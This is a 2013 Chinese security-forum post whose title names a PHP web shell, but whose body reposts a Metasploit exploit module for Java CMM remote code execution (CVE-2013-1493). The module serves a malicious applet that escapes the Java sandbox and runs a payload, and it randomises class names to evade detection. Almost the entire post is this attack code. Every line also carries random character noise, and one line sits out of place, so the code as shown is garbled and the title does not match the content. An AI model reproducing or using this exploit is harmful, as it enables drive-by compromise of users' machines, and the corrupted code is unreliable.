找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2337|回复: 0
打印 上一主题 下一主题

STUNSHELL PHP Web Shell远程执行代码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:31:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
##
5 ?; h/ l- t" f1 e0 u& K# Z% {2 [* Y" U4 e; w; }: F. j) `
# This file is part of the Metasploit Framework and may be subject to/ L, }% l: E2 O% D) S$ h
# redistribution and commercial restrictions. Please see the Metasploit1 X) j# v8 F1 @! k+ J1 ~4 ]7 T
# web site for more information on licensing and terms of use.
2 k+ c% e/ l$ L7 X+ i# \# http://metasploit.com/
& l" t' \+ F. I##  [' g% R8 L- R6 [; F5 U
require ‘msf/core’: [' V/ f& p8 H% `# l2 y5 d
require ‘rex’* l! v$ o3 A) E- F) `( c- b
class Metasploit3 < Msf::Exploit::Remote
) V; b4 C6 ^* b( y' u- o5 R) dRank = NormalRanking
( L/ c8 V2 A; _# w) l, Y( @" vinclude Msf::Exploit::Remote::HttpServer::HTML
1 y+ ^! \. r  C4 l7 Z' @* q  v( Hinclude Msf::Exploit::EXE
5 J2 F' d6 F5 Pinclude Msf::Exploit::Remote::BrowserAutopwn
" w1 L) @  ?( b; _4 [& y  b+ Pautopwn_info({ :javascript => false })
: F; R( z+ w6 k+ Odef initialize( info = {} )& e) y; n, l* ^, E0 M( Y" i
super( update_info( info,9 r8 G- O% C) P7 v6 x$ g, K
‘Name’ => ‘Java CMM Remote Code Execution’,7 Y/ N9 |/ f+ T9 O% P
‘Description’ => %q{
) X: O! r. H' F+ SThis module abuses the Color Management classes from a Java Applet to run$ ^0 B$ |. p" O0 \& m, z) M5 n  f
arbitrary Java code outside of the sandbox as exploited in the wild in February
7 q. r2 F2 S( kand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
- x4 O2 l$ C0 Q: b# g5 {$ s7 ]and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
, |! [9 ]5 ]  }+ A3 A  h; Csystems. This exploit doesn’t bypass click-to-play, so the user must accept the java: A; r4 T8 _% v, E/ v3 z5 A/ U) I
warning in order to run the malicious applet.
& }/ G1 H" X) \% h- A},
! Q2 O1 i. f( a‘License’ => MSF_LICENSE,2 v+ p( {: O8 f- B1 {$ v
‘Author’ =>
; K( A5 k8 H6 X% q& B'Unknown', # Vulnerability discovery and Exploit
9 q. p  w0 l. a8 x( w'juan vazquez' # Metasploit module (just ported the published exploit)
- C3 E; @! k" Y' P: \4 p7 {],
" n" d; Y: p% g+ B, m& J4 l‘References’ =>
' R$ [! y+ N8 p3 u; n0 ?- q. I[' w9 o4 b# O# c3 g" g, z2 A: u
[ 'CVE', '2013-1493' ],
( m2 f/ x3 L! i3 k9 d6 K[ 'OSVDB', '90737' ],$ I* W* s" @& `! m* v5 T
[ 'BID', '58238' ],
; t; \8 \# G" I- q1 E& L  t' z* m! ^[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],! f: \4 o# Y6 L7 h
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
4 h8 K* ^% b6 d1 q: c  O6 i  ~/ y$ u[ 'URL', 'http://pastie.org/pastes/6581034' ]$ R% A! f4 b4 L2 S, V" R' ^
],! S) f, T0 y0 ]$ v# t
‘Platform’ => [ 'win', 'java' ],3 F! v7 @# j' m5 ~6 `6 e# B$ k7 A
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
* ~% A4 [3 `  \# \- H‘Targets’ =>/ W* C2 w' k, l, F# E. E( Y
[
& X4 H/ r" @5 M[ 'Generic (Java Payload)',: O* @0 W8 {& A+ C
{4 r6 @" ^7 X& U8 m, ]- i
'Platform' => 'java',* H8 {5 H' O7 D; R( p
'Arch' => ARCH_JAVA, }! i8 x6 @- h7 A
}( P7 y* ^# A9 m9 `9 x3 D) S
],1 W5 J+ @& n' H6 ~; p
[ 'Windows x86 (Native Payload)',. k2 G5 O  A" T" {% O; ]
{
4 _  S( A; l+ l$ ^0 S. c2 M3 Y8 f% G'Platform' => 'win',5 h+ C0 J8 B0 O! `
'Arch' => ARCH_X86
) f! f" V# o" i+ L( _$ B}' i1 h% {0 o# a4 i3 f, z1 ?' ]) d
]! a1 `" u3 A) F$ A  v; \1 H0 ^
],3 r$ C' B  V: U- ]
‘‘DisclosureDate’ => ‘Mar 01 2013′5 m' w1 U3 ^; N# L+ w, l" M- o
))# G! U" g3 q  _% I" Z9 |/ l+ Y
end
% V, A* l" t3 Q8 F7 Qdef setup
7 J3 y* \- s' }% B* j+ I2 Fpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
) E2 V0 L7 y) G( X) A@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 d* X6 r2 v! r, c! p) ?, Qpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
7 b5 T4 N& H1 A, A  {@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
4 s9 }/ z" k" ~' Y% {1 v& H0 Kpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)& r- g9 M9 T. B" `1 _/ E
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }8 x/ ~+ J! ]" o5 `5 J, j
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
& Q7 F- T. T2 K; S/ C) m@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }4 m. Z; v6 L9 n$ ]  v
@init_class_name = rand_text_alpha(“Init”.length). O3 J$ v# p: p  R. |$ w
@init_class.gsub!(“Init”, @init_class_name)
: u. C1 A; G2 g! `super, `; m+ C" d% ^
end
1 ?3 k0 f: e* B7 w3 f9 Kdef on_request_uri(cli, request)
. i" U* x3 x8 M$ {. c3 ?print_status(“handling request for #{request.uri}”)
  H; d, O3 v  F- c7 S: Acase request.uri) o& E& C4 [! h. Q+ X* N# ]
when /\.jar$/i' T- U2 L) F' g) X6 H% L" p$ W
jar = payload.encoded_jar7 t1 M4 M/ v3 t# V2 y; L4 ^
jar.add_file(“#{@init_class_name}.class”, @init_class)6 H; x) b) q! p( T$ g, [
jar.add_file(“Leak.class”, @leak_class)
: h4 m7 J/ h' Q$ e5 M9 ]* i- gjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
, S8 y9 [# c2 Ejar.add_file(“MyColorSpace.class”, @color_space_class)
9 L$ j! |# E4 L1 D& J! wDefaultTarget’ => 1,$ m' l) P: U3 G/ \* N1 a" p
metasploit_str = rand_text_alpha(“metasploit”.length)$ D: \& q4 Y! M: B* q! t
payload_str = rand_text_alpha(“payload”.length)0 ?; }9 j' P- H3 @
jar.entries.each { |entry|
' c- F& ?9 n  M- G. N4 sentry.name.gsub!(“metasploit”, metasploit_str)$ J+ b# m! |9 I' S% N9 T0 H! D# [9 q
entry.name.gsub!(“Payload”, payload_str)9 D1 v2 p8 f' y( `# B
entry.data = entry.data.gsub(“metasploit”, metasploit_str)! ~' |2 j/ w( t: a
entry.data = entry.data.gsub(“Payload”, payload_str)+ ~: e# ^- V! F0 u) G' ]
}
+ d+ I$ m. G( Z) M2 Kjar.build_manifest' c9 c! I# ?, ?
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
7 b, o, K7 x) g" n" o/ zwhen /\/$/, |0 Q  U% s0 x$ d, {: i# d
payload = regenerate_payload(cli)
( H) u6 ]! [; s6 e* Mif not payload* L  d/ U# L4 Q# M1 F
print_error(“Failed to generate the payload.”)9 {: C. |+ [9 b0 P9 E. F
send_not_found(cli)
. j  P& J# ?* d1 s. v- Z" }return, x4 i7 }$ U7 b  l) a9 w  [3 \6 x
end
& D1 h% m: p6 asend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })6 ^9 D+ u- y# n+ J! h* R# r6 T2 G
else
3 @2 N4 z3 T  i; R8 Ssend_redirect(cli, get_resource() + ‘/’, ”)
2 w+ a5 o  E! eend6 _% v2 l& k" [& V  H# ~! \, I
end( _$ a3 l- {3 b! k* J
def generate_html
$ t4 ?3 T- n, Y" n4 ?% xhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
7 y' o: K+ e# m6 w& Qhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
$ y2 _" }) ^+ F, h" C2 D0 _html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|0 v9 w) N, j. _* g# h
html += %Q|</applet></body></html>|
1 |' M  U  T4 D7 `: E5 breturn html
. ^8 ^5 g. z9 E2 T5 ]; Lend
  Q; ~  X; a9 j5 L" V5 N) eend
  D1 ^: S7 y. lend
0 b# o) S& ?: \; ^# W3 F0 N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表